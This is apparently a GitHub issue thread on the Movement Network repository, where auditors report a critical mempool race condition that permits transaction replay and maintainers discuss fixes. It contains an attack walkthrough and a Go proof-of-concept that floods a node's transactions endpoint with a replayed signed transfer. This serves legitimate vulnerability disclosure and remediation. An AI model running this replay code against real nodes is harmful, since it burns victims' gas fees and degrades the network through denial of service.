movementlabsxyz / movement

The Movement Network is a Move-based L2 on Ethereum.
Apache License 2.0

LIB1-1 Multithreading Issue Leads to Transaction Replay Vulnerability #416

Open SA124 opened 3 weeks ago

SA124 commented 3 weeks ago

LIB1-1 Multithreading Issue Leads to Transaction Replay Vulnerability
Auditor: Movebit
Code: Aptos Core
Severity: Critical
Discovery Methods: Manual Review
Status: Pending
Code Location:
  protocol-units/mempool/util/src/lib.rs#50
  protocol-units/da/m1/light-node/src/v1/sequencer.rs#76
  networks/suzuka/suzuka-full-node/src/partial.rs#134

Description: In the light-node, when adding a transaction to the mempool, the mempool_util::MempoolTransactionOperations::add_transaction function is called, as shown below:

[Screenshot: mempool_util::MempoolTransactionOperations::add_transaction]

This function checks whether the transaction already exists, to prevent replay attacks. However, this check can be bypassed. The tick_write_transactions_to_da thread of the full-node is responsible for writing transactions to the mempool, while the run_block_proposer thread is responsible for popping transactions out of the mempool and sending them to the DA. Once a transaction A has been popped, it no longer exists in the mempool and can be re-added. The prerequisite for this attack is that transaction A has not yet been executed, but this condition is easily met because transactions are written to the mempool faster than blocks are executed.

Impact: Under normal circumstances, the repeated transactions that are packaged into a block will not execute successfully but will still consume gas fees. A third-party attacker can exploit this by replaying a large number of user transactions, resulting in asset loss for the victims.
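
For illustration, here is a minimal sketch of the check-then-act gap described above (a hypothetical, simplified Mempool type; not the repo's actual RocksdbMempool API):

use std::collections::HashSet;

// Hypothetical, simplified mempool holding pending transaction ids.
// This sketches the interleaving only; it is not the repo's mempool API.
struct Mempool {
    pending: HashSet<u64>,
}

impl Mempool {
    // Mirrors the add_transaction duplicate check described above.
    fn add_transaction(&mut self, id: u64) -> bool {
        if self.pending.contains(&id) {
            return false; // rejected: an identical transaction is still pending
        }
        self.pending.insert(id)
    }

    // Mirrors the block-proposer path: the transaction leaves the pool
    // before it has been executed.
    fn pop_transaction(&mut self, id: u64) -> bool {
        self.pending.remove(&id)
    }
}

fn main() {
    let mut pool = Mempool { pending: HashSet::new() };

    // tick_write_transactions_to_da-like step: the first submission is accepted.
    assert!(pool.add_transaction(1));

    // run_block_proposer-like step: the tx is popped for the DA, not yet executed.
    assert!(pool.pop_transaction(1));

    // Replay window: the tx is gone from the pool, so the check passes again.
    assert!(pool.add_transaction(1));
    println!("transaction accepted twice before it ever executed");
}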

Suggestion: A proper fix is fairly complex; it is recommended to refer to Aptos's replay prevention mechanism. A simpler approach could be to revalidate transactions when packaging a block, after each block has been executed.

l-monninger commented 3 weeks ago

Because of the sequence numbers, you shouldn't be able to actually replay transactions here by the time VM execution occurs.

And, ultimately, that's where such replay prevention has to take place. Fundamentally, transaction ingress through to execution QC can't itself be synchronized throughout the network unless the CAP tradeoff is CP. That is, even if you had synchronized the mempool to account for in-flight transactions on a single node, you couldn't have guarantees about the mempools of other nodes without being CP.

However, you can still use this gap to attempt a DOS. I think it would be difficult in our current setup, though, to run this through a single node, because we don't actually pop transactions out of the mempool when piping through to block building; instead, we only garbage collect, which currently takes place on a fixed interval appropriate for block execution speed.

Over multiple nodes, this remains a vector for a DOS attack and may add credence to #339. However, we could assess whether the validation performed at the VM level is already performant enough--as the solution would involve tracking transactions in a similar manner.

poetyellow commented 3 weeks ago

Our audit is based on the 030fe011da8bd7eca75fa0a37197205767bef7ec commit. Based on our audit, we have the following preliminary knowledge:

  1. The entire Movement architecture has two mempools: one is Aptos built-in CoreMemoryPool, and the other is the light-node's RocksdbMempool.
  2. The verification process for Movement transactions consists of the following steps:
     a. vm_validator.validate_transaction(): validates that a transaction's sequence_number is higher than the current db_sequence_number.
     b. core_mempool.add_txn(): validates that a transaction's sequence_number is higher than the current db_sequence_number.
     c. executor.execute_block(): validates that a transaction's sequence_number is exactly db_sequence_number + 1.
  3. executor.execute_block() executes in blocks, meaning that even if the transactions within do not pass validation, they will still be saved to the database along with the block.
  4. Under normal circumstances, after executor.execute_block() runs, the sender's gas fee is deducted for transactions that did not pass validation, because the node still spends disk space storing these invalid transactions. (Of course, there is a vulnerability where the gas fee is not deducted; see https://github.com/movementlabsxyz/movement/issues/409.)

Therefore, we can exploit this race condition vulnerability to launch an attack:

  1. First, we know that Movement packages 10 transactions within 1 second.
  2. Suppose attacker A obtains a transaction Tx1 from victim V.
  3. The victim sends the first Tx1, and then within 1 second, the attacker sends 9 more copies of Tx1.
  4. These 10 identical transactions will pass the vm_validator.validate_transaction() and core_mempool.add_txn() validations and will be packaged into a block.
  5. During the executor.execute_block() phase, only the first Tx1 will be successfully executed, while the other 9 will fail. Even though they fail, these 9 transactions will still be included in the block and stored, and the gas fee will be deducted from victim V (see the sketch after these steps).
  6. During this attack, attacker A incurs no cost, as he can simply replay transactions he is aware of without any conditions.
  7. Due to vulnerability https://github.com/movementlabsxyz/movement/issues/409, the gas fee will not be deducted multiple times while that vulnerability is unpatched. However, the failed transactions will still be stored locally on the node, consuming storage space and generating junk transactions. Once https://github.com/movementlabsxyz/movement/issues/409 is patched, the impact becomes that victim V's gas fee is deducted multiple times.
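
The sketch below walks the ten copies through the three checks from the preliminary-knowledge list, using plain integers and the semantics exactly as stated there (illustrative code, not the actual validator), and reproduces the result in steps 4 and 5:

fn main() {
    let mut db_sequence_number: u64 = 0; // victim's committed sequence number
    let tx_sequence_number: u64 = 1;     // Tx1, submitted 10 times
    let copies: usize = 10;

    // (a) vm_validator.validate_transaction() and (b) core_mempool.add_txn():
    // all 10 copies are admitted before any of them executes, so every
    // admission check sees the stale db_sequence_number of 0.
    let admitted: Vec<u64> = (0..copies)
        .map(|_| tx_sequence_number)
        .filter(|seq| *seq > db_sequence_number)
        .collect();
    assert_eq!(admitted.len(), copies);

    // (c) executor.execute_block(): only the first copy matches db_seq + 1;
    // the other 9 fail validation but are still stored with the block.
    let mut executed = 0;
    let mut failed_but_stored = 0;
    for seq in admitted {
        if seq == db_sequence_number + 1 {
            db_sequence_number += 1;
            executed += 1;
        } else {
            failed_but_stored += 1;
        }
    }

    assert_eq!(executed, 1);
    assert_eq!(failed_but_stored, 9);
    println!("{executed} executed, {failed_but_stored} stored as failed duplicates");
}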

We have verified in a locally deployed test environment that the transaction replay issue exists.

l-monninger commented 2 weeks ago

These 10 identical transactions will pass the vm_validator.validate_transaction() and core_mempool.add_txn() validations and will be packaged into a block.

They will not be packaged into a block if they are identical. Blocks have B-Tree Sets as their transaction container. At some point during ingress, serialization, or deserialization, duplicates will be removed by honest nodes.
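
For reference, a tiny sketch of the dedup an ordered-set container would provide, assuming the set is keyed on the full transaction contents (as the discussion below shows, the current Block type actually stores a Vec):

use std::collections::BTreeSet;

// Sketch: if a block's transaction container were an ordered set keyed on the
// full transaction bytes, inserting the same transaction twice is a no-op.
fn main() {
    let mut block_txs: BTreeSet<Vec<u8>> = BTreeSet::new();

    let tx1 = b"signed tx bytes".to_vec();
    assert!(block_txs.insert(tx1.clone())); // first copy is kept
    assert!(!block_txs.insert(tx1));        // identical copy is dropped

    assert_eq!(block_txs.len(), 1);
}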

l-monninger commented 2 weeks ago

Would you be able to share the scripts and configuration of your local environment?

l-monninger commented 2 weeks ago

This can happen if the transactions are included in different blocks, which could be achieved via particular timing or by sending to different nodes.

l-monninger commented 2 weeks ago

So, when we turn on #409 we will have to have solved this.

l-monninger commented 2 weeks ago

via particular timing

The particular timing here would presumably need to be that the transaction has been garbage collected, but not yet executed--since we don't pop transactions out of the mempool.

poetyellow commented 2 weeks ago

Hi, we built a Docker environment based on the 030fe011da8bd7eca75fa0a37197205767bef7ec commit.

poetyellow commented 2 weeks ago
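
// PoC used to reproduce the replay: it repeatedly POSTs a signed transaction
// to the node's /v1/transactions endpoint at roughly 10 requests per second.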
package main

import (
    "bytes"
    "encoding/json"
    "fmt"
    "io"
    "log"
    "net/http"
    "sync"
    "time"
)

const url = "http://127.0.0.1:30731/v1/transactions"

var requestPayload = map[string]interface{}{
    "sender":                    "0x60b5f67bb14334b371f207df24d6f717e50941a67f84db471d661de5140e23c9",
    "sequence_number":           "0",
    "max_gas_amount":            "1498",
    "gas_unit_price":            "100",
    "expiration_timestamp_secs": "1755253215",
    "payload": map[string]interface{}{
        "function":       "0x1::aptos_account::transfer",
        "type":           "entry_function_payload",
        "type_arguments": []interface{}{},
        "arguments": []interface{}{
            "0x60b5f67bb14334b371f207df24d6f717e50941a67f84db471d661de5140e23c8",
            "100",
        },
    },
    "signature": map[string]interface{}{
        "type":       "ed25519_signature",
        "public_key": "0x18367b2687ee313cc3baea86d31619e5bef1158df4bb0f6d2476a9601e978ae2",
        "signature":  "0x771e15db6f57c9793db583e8a4cbe13d1a95ca47f1fcf375adb0728abc5f8b77a43de5a20bf699876d63f78418f87c257717dc5a0a24789af0ec79c1cf13af0f",
    },
}

var requestPayload2 = map[string]interface{}{
    "sender":                    "0x60b5f67bb14334b371f207df24d6f717e50941a67f84db471d661de5140e23c9",
    "sequence_number":           "2",
    "max_gas_amount":            "13",
    "gas_unit_price":            "100",
    "expiration_timestamp_secs": "1755308158",
    "payload": map[string]interface{}{
        "function":       "0x1::aptos_account::transfer",
        "type":           "entry_function_payload",
        "type_arguments": []interface{}{},
        "arguments": []interface{}{
            "0x60b5f67bb14334b371f207df24d6f717e50941a67f84db471d661de5140e23c8",
            "100",
        },
    },
    "signature": map[string]interface{}{
        "type":       "ed25519_signature",
        "public_key": "0x18367b2687ee313cc3baea86d31619e5bef1158df4bb0f6d2476a9601e978ae2",
        "signature":  "0x45e9e00617dc0af6160412bada9588853e4a9cb7aea893e202efcfc37c735d9233b108f61b889e0a46e81860554df68611b807db24550efb5051e96617465503",
    },
}

func sendRequest(wg *sync.WaitGroup, requestPayload map[string]interface{}, i int) {
    defer wg.Done()

    jsonData, err := json.Marshal(requestPayload2)
    if err != nil {
        log.Println("Error marshalling JSON:", err)
        return
    }

    resp, err := http.Post(url, "application/json", bytes.NewBuffer(jsonData))
    if err != nil {
        log.Println("Error sending request:", err)
        return
    }
    defer resp.Body.Close()

    body, err := io.ReadAll(resp.Body)
    if err != nil {
        log.Println("Error reading response body:", err)
        return
    }
    // fmt.Printf("Response Status: %s\n", resp.Status)
    fmt.Printf("%d Response Body: %s\n", i, body)
}

func main() {
    var wg sync.WaitGroup
    numRequests := 200000000

    for i := 0; i < numRequests; i++ {
        wg.Add(1)
        time.Sleep(100 * time.Millisecond)
        go sendRequest(&wg, requestPayload, i)
    }

    wg.Wait()
}
poetyellow commented 2 weeks ago

The above Golang source code is the attacking code.

poetyellow commented 2 weeks ago

These 10 identical transactions will pass the vm_validator.validate_transaction() and core_mempool.add_txn() validations and will be packaged into a block.

They will not be packaged into a block if they are identical. Blocks have B-Tree Sets as their transaction container. At some point during ingress, serialization, or deserialization, duplicates will be removed by honest nodes.

Hello,

This is the Tx in the light-node Mempool:

pub struct MempoolTransaction {
    pub transaction: Transaction,
    pub timestamp: u64,
    pub slot_seconds: u64,
}

The replay Tx is :

pub struct Transaction {
    pub data: Vec<u8>,
    pub sequence_number: u64,
    pub id: Id,
}

The Block is :

pub struct Block {
    pub metadata: BlockMetadata,
    pub parent: Vec<u8>,
    pub transactions: Vec<Transaction>,
    pub id: Id,
}

There is no B-Tree Set.

l-monninger commented 2 weeks ago

@poetyellow

My bad, I guess that must have been factored out at some point. It also looks like the usage of a BTreeSet in the Memseq in-memory buffer, along with the whole buffer, is no longer extant despite a lingering comment.

The other thing is that RocksDB uniqueness doesn't help us here because we are creating a key from the wrapped mempool transaction: https://github.com/movementlabsxyz/movement/blob/31386f74a2700920fec093775c221acdc9c6c7a2/protocol-units/mempool/move-rocks/src/lib.rs#L37
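
Roughly the failure mode, sketched with a hypothetical key construction (the real one is at the link above): assuming the key incorporates wrapper fields such as the timestamp, two submissions of the same inner transaction map to different RocksDB keys and both survive.

// Sketch of why wrapper-derived keys defeat RocksDB key uniqueness.
// Hypothetical key construction; the real one is linked above.
struct MempoolTransaction {
    transaction_id: u64, // stands in for the inner Transaction's Id
    timestamp: u64,
    slot_seconds: u64,
}

fn construct_key(tx: &MempoolTransaction) -> String {
    // Keyed on wrapper fields (slot/timestamp) plus the id, not on the id alone.
    format!("{}:{}:{}", tx.slot_seconds, tx.timestamp, tx.transaction_id)
}

fn main() {
    let first = MempoolTransaction { transaction_id: 42, timestamp: 1000, slot_seconds: 2 };
    let replay = MempoolTransaction { transaction_id: 42, timestamp: 1005, slot_seconds: 2 };

    // Same inner transaction, different keys: RocksDB stores both.
    assert_ne!(construct_key(&first), construct_key(&replay));
}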

I believe the safety of each of the approaches alluded to in this thread is something like:

  1. A Memseq key uniqueness approach only prevents this attack from occurring via transactions sent through the same node, or strictly, the same move-rocks pool.
  2. The BTreeSet approach will account for the replay attack when the replay transactions would be placed in the same block, but not across blocks.
  3. DB-based validation after passing through the DA is safe w.r.t. this issue, but opens up more potential for DOS. We can get the transaction by hash from the AptosDB (it will have been called here during execution); if the transaction was previously included, we could filter it out of the blocks. I need to double-check whether the VM is already doing this; if so, we can just use the BTreeSet to make sure it doesn't happen within a block. The problem, however, is that you're still doing a fair bit of work on every node for this transaction. Per my comment about CP earlier, though, I don't think there's a good way around this. The best thing to do would probably be to position the mempool for independent scaling. We are also fundamentally accepting a fair bit of DOS risk by using a permissionless, public DA in the first place, so some tolerance for this risk is presumed.
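
A rough sketch of what that DB-based filtering could look like when assembling a block (the LedgerReader trait and all names here are hypothetical stand-ins for the AptosDB hash lookup):

use std::collections::BTreeSet;

// Hypothetical stand-in for the AptosDB "get transaction by hash" lookup.
trait LedgerReader {
    fn transaction_exists(&self, tx_hash: &[u8; 32]) -> bool;
}

// Option 3 sketch: drop a transaction if it was already committed (DB lookup)
// or if an identical one is already in the block being built (in-block set).
fn filter_block_transactions<R: LedgerReader>(
    reader: &R,
    candidate_hashes: Vec<[u8; 32]>,
) -> Vec<[u8; 32]> {
    let mut seen_in_block = BTreeSet::new();
    candidate_hashes
        .into_iter()
        .filter(|hash| !reader.transaction_exists(hash)) // already committed: replay
        .filter(|hash| seen_in_block.insert(*hash))      // duplicate within this block
        .collect()
}

struct InMemoryLedger {
    committed: BTreeSet<[u8; 32]>,
}

impl LedgerReader for InMemoryLedger {
    fn transaction_exists(&self, tx_hash: &[u8; 32]) -> bool {
        self.committed.contains(tx_hash)
    }
}

fn main() {
    let ledger = InMemoryLedger { committed: BTreeSet::from([[1u8; 32]]) };
    // [1u8; 32] was already committed (a replay), [2u8; 32] is submitted twice.
    let candidates = vec![[1u8; 32], [2u8; 32], [2u8; 32]];
    let kept = filter_block_transactions(&ledger, candidates);
    assert_eq!(kept, vec![[2u8; 32]]);
}
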
l-monninger commented 2 weeks ago

@mzabaluev Going to move some of this over to our #475 while we're undecided on the best course of action here.

mzabaluev commented 1 week ago

The above Golang source code is the attacking code.

I think this needs cleanup. requestPayload2 is the actual request that gets sent repeatedly while requestPayload is ignored, is that how it should be?

mzabaluev commented 1 week ago

3. DB-based validation after passing through the DA is safe w.r.t. this issue, but opens up more potential for DOS.

I have filed #526 to check if we can avoid this.

mzabaluev commented 1 week ago

3. We can get the transaction by hash from the AptosDB (it will have been called here during execution); if the transaction was previously included, we could filter it out of the blocks.

Would a transaction lookup be sufficient with pruning enabled? If an attacker sends a sufficiently old transaction, it would have been pruned from the DB.

l-monninger commented 1 week ago

Would a transaction lookup be sufficient with pruning enabled? If an attacker sends a sufficiently old transaction, it would have been pruned from the DB.

In theory, by this point, the account sequence number check in the mempool is sufficient.

l-monninger commented 1 week ago

The only reason to use the transaction_by_hash instead of account_sequence_number for the filtering is that you might want to charge and deter the honest user for trying to aggressively send transactions that are close to the correct sequence number. You can do this by letting those transactions through the very first time to have them aborted in the VM.

Later on, i.e., after pruning, the mempool would check the account sequence number and deny these transactions up front. It loses the deterrence aspect, but based on how far off their sequence number is, it's more likely these transactions are just purely fraudulent.
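
A sketch of the tradeoff between the two filters (purely illustrative decision logic; the exact threshold semantics are an assumption):

// Hypothetical decision logic contrasting the two filtering strategies above.
enum IngressDecision {
    AdmitToBlock,  // let the VM abort it and charge the sender (deterrence)
    RejectUpFront, // deny in the mempool before doing any execution work
}

fn filter_by_hash(already_committed: bool) -> IngressDecision {
    // transaction_by_hash style: only an exact, already-committed replay is
    // dropped; a fresh near-miss goes through once and is aborted in the VM.
    if already_committed {
        IngressDecision::RejectUpFront
    } else {
        IngressDecision::AdmitToBlock
    }
}

fn filter_by_sequence_number(tx_seq: u64, account_seq: u64) -> IngressDecision {
    // account_sequence_number style: anything at or below the committed
    // sequence number is denied up front; cheaper, but no deterrence.
    if tx_seq <= account_seq {
        IngressDecision::RejectUpFront
    } else {
        IngressDecision::AdmitToBlock
    }
}

fn main() {
    // A near-miss resend: not an exact committed replay, so the hash filter
    // admits it once (and the VM charges it), while the sequence-number
    // filter denies it up front.
    assert!(matches!(filter_by_hash(false), IngressDecision::AdmitToBlock));
    assert!(matches!(
        filter_by_sequence_number(5, 5),
        IngressDecision::RejectUpFront
    ));
}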

mzabaluev commented 1 week ago

Thanks @l-monninger. I agree the transaction_by_hash check will solve the replay problem at some added runtime cost.

This bit looks like something that should be documented for users:

you might want to charge and deter the honest user for trying to aggressively send transactions that are close to the correct sequence number.

l-monninger commented 1 day ago

I believe #542 and #502 resolve this, though we still need to recreate the test in our test harness. @poetyellow should we reach out in a separate channel about re-reviewing?